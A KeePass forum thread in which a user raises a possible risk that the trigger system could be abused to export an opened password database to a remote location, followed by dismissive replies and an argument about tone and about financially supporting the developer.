Potential security issue with trigger system.
A lightweight and easy-to-use password manager
Brought to you by:
dreichl
Menu
▾
▴
I do not know if this has been discussed before and do not care to search but I wanted to let everyone know that it would be easy for anyone to get a copy of your database by using the trigger system to export your currently opened database to a remote location. The trigger system makes this task way to easy for anyone that wants to do it and since you do not even have to be logged in to any database to setup triggers then you could just setup the trigger and wait for the owner of the database to open it one time and in theory all of the passwords contained in that database would be exported the location they setup in the trigger.
This is just a theory and I have not tested it but it looks like the system is setup in such a way that would allow this to happen if my understanding of the application is correct. I would like to hear others opinions on this topic and if this is possible then an easy fix would simply be to lock the entire application down (settings windows and all) until you have successfully opened a database.
I think this should be done anyway simply for the fact that anyone could change the programs options without even opening a database which could cause potential problems in itself.
Cheers,
What.
Thanks for not bothering to check if this has been discussed!
Any machine that is compromised to the point of being able to write to files at will, has already had all information worth gathering stolen.
cheers, Paul
If you had any clue as to what I was talking about you might have been able to formulate a better response. I will help you out in this endeavor however. I am NOT talking about a machine that has been compromised. I am simply talking about an everyday scenario where you let someone use your computer for 5 minutes to send an email to a friend. People do this ALL THE TIME and if the person you giving temporary access to decides to do what I stated above ( and your reply confirms it's possible ) then this could lead to your passwords being stolen. THIS IS A SECURITY ISSUE THAT NEEDS TO BE ADDRESSED AND IS EASILY FIXABLE.
I do not know who the authors of this application are but you seem to taking a defensive stance on the issue so I will assume you are one of them so here is my advise to you or anyone who does work on this application. Stop turning a blind eye to the obvious shortcomings of this application and just fix the problems. It's an easy fix and anyone with even a small measure of intelligence and coding experience could fix this problem in 10 minutes. If you do not have anything to do with the development of this application then do us both a favor and do not reply to topics that. 1.) You cannot understand. 2.) Cannot do anything about.
Cheers, What
Sorry.. but I have to speak up a bit here. As I am just a simple user of KeePass, it is clear to me from a couple of postings this week on various threads that KeePass is clearly getting leveraged by more people everyday… and as part of that, it is clear that higher levels of "auditing" and "expectations" are being desired.
Now with this said, I honestly have to say.. it sure appears to me that those with critical (and yes, hopefully constructive critical feedback) do not appear to have taken time to support this quite effective product with $$. I really think a person really should be ready to support this product with more than just formum "feedback".
@grogier
Well said. Some concrete support for Dominik is the way to go.
I'm told that 'HuhWhats' style of approach is known as "professional auditing"!!!! ….. (5th post) ……